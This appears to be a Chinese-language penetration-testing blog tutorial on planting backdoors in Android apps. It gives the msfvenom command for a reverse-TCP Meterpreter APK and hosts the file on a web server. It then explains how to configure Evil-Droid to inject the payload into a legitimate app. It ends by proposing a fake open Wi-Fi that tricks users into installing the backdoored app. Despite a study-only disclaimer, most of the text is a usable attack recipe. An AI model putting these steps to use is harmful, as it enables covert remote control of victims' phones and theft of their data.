在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!
一、生成APK后门
通过 MSF 生成一个 apk 的后门应用
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk
将它移到/var/www/html/目录下
mv hack.apk /var/www/html/
在Windows上下载,并在模拟器中安装再打开,和其他的渗透测试的一样的步骤监听等待目标机上返回连接,kali即可获得权限
当然也可以下载到自己手机中,最好是已经换下来的旧手机
二、注入后门到APP
首先要禁用IPV6,不然可能会影响生成的payload质量
使用命令echo "net.ipv6.conf.eth0.disable_ipv6=1" \>\>/etc/sysctl.conf
然后通过sysctl -p检查
我们使用Evil-Droid工具,这是一个基于Python的开源工具,专门用于自动化安卓应用的安全分析。它旨在帮助安全研究人员、开发人员和普通用户快速检测潜在的恶意行为或漏洞,并理解应用程序的工作原理。
将安装Evil-Droid工具上传并解压进入目录中
这个工具会检测是否联网,检测的方式是通过ping谷歌来确定,一般来说我们无法ping通谷歌,所以我们要修改一下其中的配置文件,让这个工具通过ping百度来确实是否联网。
使用vim evil-droid修改一下evil-droid文件
修改第40行将“google.com”改为"baidu.com"
修改第649行将“-fa monaco”删去
然后为该文件添加执行权限(执行代码后文件变绿说明成功添加权限)
chmod +x evil-droid
升级tools文件夹中的apktool.jar,该工具用于逆向apk文件。它可以将资源解码,并在修改后可以重新构建它们。它还可以执行一些自动化任务,例如构建apk文件。工具包中默认的版本为2.2已过期,需要进行更新,至少是2.4版本。
运行./evil-droid,在检测到网络环境正常后会自动下载缺少的依赖,下面是部分运行界面
完成后运行
我们选择3(NEW)
然后是监听地址、端口、payload名称默认即可,payload类型选择android/meterpreter/reverse_tcp
之后就进入了图形化界面选择需要植入后门的apk文件
选择好安装包,点击“确定”后,会跳出如下界面,可以选择“确定”,也可以在msf中监听,这里我选择“exit”
我们再将安装包移到apache服务下,并再次开启apache
evil-droid结束后会自动关闭apache服务一定要再次手动开启
目标下载app打开后,kali就获得了对应权限
三、总结
安卓客户端渗透目前来说已经是CTF中一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成的。关于渗透思路,可以将payload注入到正常的apk中,构建一个钓鱼wifi,比如说设置一个没有密码的钓鱼wifi,需要下载软件才能正常上网,用户下载运行软件后即被远程控制。